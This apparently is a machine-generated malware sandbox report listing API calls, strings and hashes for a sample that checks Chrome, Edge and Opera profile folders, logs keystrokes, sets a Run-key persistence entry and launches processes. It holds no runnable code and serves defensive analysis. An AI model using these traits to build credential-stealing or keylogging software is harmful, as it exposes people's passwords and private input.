                                                                                                                                        APIs
                                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExistsFilePath
                                                                                                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                        • API String ID: 1174141254-4188645398
                                                                                                                                        • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                                                        • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                                                        • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                                                        • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                                                        APIs
                                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExistsFilePath
                                                                                                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                        • API String ID: 1174141254-2800177040
                                                                                                                                        • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                                                        • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                                                        • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                                                        • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                                                        APIs
                                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExistsFilePath
                                                                                                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                        • API String ID: 1174141254-1629609700
                                                                                                                                        • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                                                        • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                                                        • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                                                        • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                                                        APIs
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                                                          • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                                                          • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                                          • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                                                                          • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                                          • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                                                          • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                                                                          • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                        • String ID: [AltL]$[AltR]
                                                                                                                                        • API String ID: 2738857842-2658077756
                                                                                                                                        • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                        • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                                                        • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                        • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                                                        APIs
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExecuteShell
                                                                                                                                        • String ID: !D@$open
                                                                                                                                        • API String ID: 587946157-1586967515
                                                                                                                                        • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                        • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                                        • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                        • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                                        APIs
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State
                                                                                                                                        • String ID: [CtrlL]$[CtrlR]
                                                                                                                                        • API String ID: 1649606143-2446555240
                                                                                                                                        • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                        • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                                        • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                        • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Init_thread_footer__onexit
                                                                                                                                        • String ID: ,kG$0kG
                                                                                                                                        • API String ID: 1881088180-2015055088
                                                                                                                                        • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                                        • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                                                                        • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                                        • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteOpenValue
                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                        • API String ID: 2654517830-1051519024
                                                                                                                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                        • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                        • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteDirectoryFileRemove
                                                                                                                                        • String ID: pth_unenc
                                                                                                                                        • API String ID: 3325800564-4028850238
                                                                                                                                        • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                        • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                                                                        • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                        • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                                                                        APIs
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                        • String ID: pth_unenc
                                                                                                                                        • API String ID: 1872346434-4028850238
                                                                                                                                        • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                        • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                                                                        • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                        • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                                                                        • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                        • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                        • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                                        • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                        • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                                                        APIs
                                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                                                                        • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4100373531-0
                                                                                                                                        • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                        • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                                                        • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                        • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:5.6%
                                                                                                                                        Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:2000
                                                                                                                                        Total number of Limit Nodes:67
                                                                                                                                        execution_graph 37897 44660a 37900 4465e4 37897->37900 37899 446613 37901 4465f3 __dllonexit 37900->37901 37902 4465ed _onexit 37900->37902 37901->37899 37902->37901 40297 441819 40300 430737 40297->40300 40299 441825 40301 430756 40300->40301 40302 43076d 40300->40302 40303 430774 40301->40303 40304 43075f 40301->40304 40302->40299 40314 43034a 40303->40314 40325 4169a7 11 API calls 40304->40325 40307 4307ce 40308 430819 memset 40307->40308 40318 415b2c 40307->40318 40308->40302 40310 43077e 40310->40302 40310->40307 40312 4307fa 40310->40312 40311 4307e9 40311->40302 40311->40308 40326 4169a7 11 API calls 40312->40326 40315 43034e 40314->40315 40317 430359 40314->40317 40327 415c23 memcpy 40315->40327 40317->40310 40319 415b42 40318->40319 40324 415b46 40318->40324 40320 415b94 40319->40320 40322 415b5a 40319->40322 40319->40324 40321 4438b5 10 API calls 40320->40321 40321->40324 40323 415b79 memcpy 40322->40323 40322->40324 40323->40324 40324->40311 40325->40302 40326->40302 40327->40317 37719 442ec6 19 API calls 37892 4152c6 malloc 37893 4152e2 37892->37893 37894 4152ef 37892->37894 37896 416760 11 API calls 37894->37896 37896->37893 37903 4466f4 37922 446904 37903->37922 37905 446700 GetModuleHandleA 37908 446710 __set_app_type __p__fmode __p__commode 37905->37908 37907 4467a4 37909 4467ac __setusermatherr 37907->37909 37910 4467b8 37907->37910 37908->37907 37909->37910 37923 4468f0 _controlfp 37910->37923 37912 4467bd _initterm GetEnvironmentStringsW _initterm 37913 44681e GetStartupInfoW 37912->37913 37914 446810 37912->37914 37916 446866 GetModuleHandleA 37913->37916 37924 41276d 37916->37924 37920 446896 exit 37921 44689d _cexit 37920->37921 37921->37914 37922->37905 37923->37912 37925 41277d 37924->37925 37967 4044a4 LoadLibraryW 37925->37967 37927 412785 37928 412789 37927->37928 37973 414b81 37927->37973 37928->37920 37928->37921 37931 4127c8 37977 412465 memset ??2@YAPAXI 37931->37977 37933 4127ea 37989 40ac21 37933->37989 37938 412813 38007 40dd07 memset 37938->38007 37939 412827 38012 40db69 memset 37939->38012 37942 412822 38034 4125b6 ??3@YAXPAX DeleteObject 37942->38034 37944 40ada2 _wcsicmp 37945 41283d 37944->37945 37945->37942 37948 412863 CoInitialize 37945->37948 38017 41268e 37945->38017 37947 412966 38035 40b1ab free free 37947->38035 38033 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37948->38033 37952 41296f 38036 40b633 37952->38036 37954 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37959 412957 CoUninitialize 37954->37959 37964 4128ca 37954->37964 37959->37942 37960 4128d0 TranslateAcceleratorW 37961 412941 GetMessageW 37960->37961 37960->37964 37961->37959 37961->37960 37962 412909 IsDialogMessageW 37962->37961 37962->37964 37963 4128fd IsDialogMessageW 37963->37961 37963->37962 37964->37960 37964->37962 37964->37963 37965 41292b TranslateMessage DispatchMessageW 37964->37965 37966 41291f IsDialogMessageW 37964->37966 37965->37961 37966->37961 37966->37965 37968 4044f3 37967->37968 37972 4044cf FreeLibrary 37967->37972 37970 404507 MessageBoxW 37968->37970 37971 40451e 37968->37971 37970->37927 37971->37927 37972->37968 37974 414b8a 37973->37974 37975 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37973->37975 38040 40a804 memset 37974->38040 37975->37931 37978 4124e0 37977->37978 37979 412505 ??2@YAPAXI 37978->37979 37980 41251c 37979->37980 37985 412521 37979->37985 38062 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37980->38062 38051 444722 37985->38051 37988 41259b wcscpy 37988->37933 38067 40b1ab free free 37989->38067 37993 40ad4b 38002 40ad76 37993->38002 38091 40a9ce 37993->38091 37994 40a9ce malloc memcpy free free 37995 40ac5c 37994->37995 37995->37993 37995->37994 37997 40ace7 free 37995->37997 37995->38002 38071 40a8d0 37995->38071 38083 4099f4 37995->38083 37997->37995 38001 40a8d0 7 API calls 38001->38002 38068 40aa04 38002->38068 38003 40ada2 38004 40adaa 38003->38004 38005 40adc9 38003->38005 38004->38005 38006 40adb3 _wcsicmp 38004->38006 38005->37938 38005->37939 38006->38004 38006->38005 38096 40dce0 38007->38096 38009 40dd3a GetModuleHandleW 38101 40dba7 38009->38101 38013 40dce0 3 API calls 38012->38013 38014 40db99 38013->38014 38173 40dae1 38014->38173 38187 402f3a 38017->38187 38019 412766 38019->37942 38019->37948 38020 4126d3 _wcsicmp 38021 4126a8 38020->38021 38021->38019 38021->38020 38023 41270a 38021->38023 38221 4125f8 7 API calls 38021->38221 38023->38019 38190 411ac5 38023->38190 38033->37954 38034->37947 38035->37952 38037 40b640 38036->38037 38038 40b639 free 38036->38038 38039 40b1ab free free 38037->38039 38038->38037 38039->37928 38041 40a83b GetSystemDirectoryW 38040->38041 38042 40a84c wcscpy 38040->38042 38041->38042 38047 409719 wcslen 38042->38047 38045 40a881 LoadLibraryW 38046 40a886 38045->38046 38046->37975 38048 409724 38047->38048 38049 409739 wcscat LoadLibraryW 38047->38049 38048->38049 38050 40972c wcscat 38048->38050 38049->38045 38049->38046 38050->38049 38052 444732 38051->38052 38053 444728 DeleteObject 38051->38053 38063 409cc3 38052->38063 38053->38052 38055 412551 38056 4010f9 38055->38056 38057 401130 38056->38057 38058 401134 GetModuleHandleW LoadIconW 38057->38058 38059 401107 wcsncat 38057->38059 38060 40a7be 38058->38060 38059->38057 38061 40a7d2 38060->38061 38061->37988 38061->38061 38062->37985 38066 409bfd memset wcscpy 38063->38066 38065 409cdb CreateFontIndirectW 38065->38055 38066->38065 38067->37995 38069 40aa14 38068->38069 38070 40aa0a free 38068->38070 38069->38003 38070->38069 38072 40a8eb 38071->38072 38073 40a8df wcslen 38071->38073 38074 40a906 free 38072->38074 38075 40a90f 38072->38075 38073->38072 38079 40a919 38074->38079 38076 4099f4 3 API calls 38075->38076 38076->38079 38077 40a932 38081 4099f4 3 API calls 38077->38081 38078 40a929 free 38080 40a93e memcpy 38078->38080 38079->38077 38079->38078 38080->37995 38082 40a93d 38081->38082 38082->38080 38084 409a41 38083->38084 38085 4099fb malloc 38083->38085 38084->37995 38087 409a37 38085->38087 38088 409a1c 38085->38088 38087->37995 38089 409a30 free 38088->38089 38090 409a20 memcpy 38088->38090 38089->38087 38090->38089 38092 40a9e7 38091->38092 38093 40a9dc free 38091->38093 38095 4099f4 3 API calls 38092->38095 38094 40a9f2 38093->38094 38094->38001 38095->38094 38120 409bca GetModuleFileNameW 38096->38120 38098 40dce6 wcsrchr 38099 40dcf5 38098->38099 38100 40dcf9 wcscat 38098->38100 38099->38100 38100->38009 38121 44db70 38101->38121 38105 40dbfd 38124 4447d9 38105->38124 38108 40dc34 wcscpy wcscpy 38150 40d6f5 38108->38150 38109 40dc1f wcscpy 38109->38108 38112 40d6f5 3 API calls 38113 40dc73 38112->38113 38114 40d6f5 3 API calls 38113->38114 38115 40dc89 38114->38115 38116 40d6f5 3 API calls 38115->38116 38117 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38116->38117 38156 40da80 38117->38156 38120->38098 38122 40dbb4 memset memset 38121->38122 38123 409bca GetModuleFileNameW 38122->38123 38123->38105 38126 4447f4 38124->38126 38125 40dc1b 38125->38108 38125->38109 38126->38125 38127 444807 ??2@YAPAXI 38126->38127 38128 44481f 38127->38128 38129 444873 _snwprintf 38128->38129 38130 4448ab wcscpy 38128->38130 38163 44474a 8 API calls 38129->38163 38132 4448bb 38130->38132 38164 44474a 8 API calls 38132->38164 38133 4448a7 38133->38130 38133->38132 38135 4448cd 38165 44474a 8 API calls 38135->38165 38137 4448e2 38166 44474a 8 API calls 38137->38166 38139 4448f7 38167 44474a 8 API calls 38139->38167 38141 44490c 38168 44474a 8 API calls 38141->38168 38143 444921 38169 44474a 8 API calls 38143->38169 38145 444936 38170 44474a 8 API calls 38145->38170 38147 44494b 38171 44474a 8 API calls 38147->38171 38149 444960 ??3@YAXPAX 38149->38125 38151 44db70 38150->38151 38152 40d702 memset GetPrivateProfileStringW 38151->38152 38153 40d752 38152->38153 38154 40d75c WritePrivateProfileStringW 38152->38154 38153->38154 38155 40d758 38153->38155 38154->38155 38155->38112 38157 44db70 38156->38157 38158 40da8d memset 38157->38158 38159 40daac LoadStringW 38158->38159 38160 40dac6 38159->38160 38160->38159 38162 40dade 38160->38162 38172 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38160->38172 38162->37942 38163->38133 38164->38135 38165->38137 38166->38139 38167->38141 38168->38143 38169->38145 38170->38147 38171->38149 38172->38160 38183 409b98 GetFileAttributesW 38173->38183 38175 40daea 38176 40db63 38175->38176 38177 40daef wcscpy wcscpy GetPrivateProfileIntW 38175->38177 38176->37944 38184 40d65d GetPrivateProfileStringW 38177->38184 38179 40db3e 38185 40d65d GetPrivateProfileStringW 38179->38185 38181 40db4f 38186 40d65d GetPrivateProfileStringW 38181->38186 38183->38175 38184->38179 38185->38181 38186->38176 38222 40eaff 38187->38222 38191 411ae2 memset 38190->38191 38192 411b8f 38190->38192 38263 409bca GetModuleFileNameW 38191->38263 38204 411a8b 38192->38204 38194 411b0a wcsrchr 38195 411b22 wcscat 38194->38195 38196 411b1f 38194->38196 38264 414770 wcscpy wcscpy wcscpy CloseHandle 38195->38264 38196->38195 38198 411b67 38265 402afb 38198->38265 38202 411b7f 38321 40ea13 SendMessageW memset SendMessageW 38202->38321 38205 402afb 27 API calls 38204->38205 38206 411ac0 38205->38206 38207 4110dc 38206->38207 38208 41113e 38207->38208 38213 4110f0 38207->38213 38346 40969c LoadCursorW SetCursor 38208->38346 38210 411143 38347 4032b4 38210->38347 38365 444a54 38210->38365 38211 4110f7 _wcsicmp 38211->38213 38212 411157 38214 40ada2 _wcsicmp 38212->38214 38213->38208 38213->38211 38368 410c46 10 API calls 38213->38368 38217 411167 38214->38217 38215 4111af 38217->38215 38218 4111a6 qsort 38217->38218 38218->38215 38221->38021 38223 40eb10 38222->38223 38236 40e8e0 38223->38236 38226 40eb6c memcpy memcpy 38227 40ebe1 38226->38227 38228 40ebb7 38226->38228 38227->38226 38229 40ebf2 ??2@YAPAXI ??2@YAPAXI 38227->38229 38228->38227 38230 40d134 16 API calls 38228->38230 38231 40ec2e ??2@YAPAXI 38229->38231 38234 40ec65 38229->38234 38230->38228 38231->38234 38246 40ea7f 38234->38246 38235 402f49 38235->38021 38237 40e8f2 38236->38237 38238 40e8eb ??3@YAXPAX 38236->38238 38239 40e900 38237->38239 38240 40e8f9 ??3@YAXPAX 38237->38240 38238->38237 38241 40e911 38239->38241 38242 40e90a ??3@YAXPAX 38239->38242 38240->38239 38243 40e931 ??2@YAPAXI ??2@YAPAXI 38241->38243 38244 40e921 ??3@YAXPAX 38241->38244 38245 40e92a ??3@YAXPAX 38241->38245 38242->38241 38243->38226 38244->38245 38245->38243 38247 40aa04 free 38246->38247 38248 40ea88 38247->38248 38249 40aa04 free 38248->38249 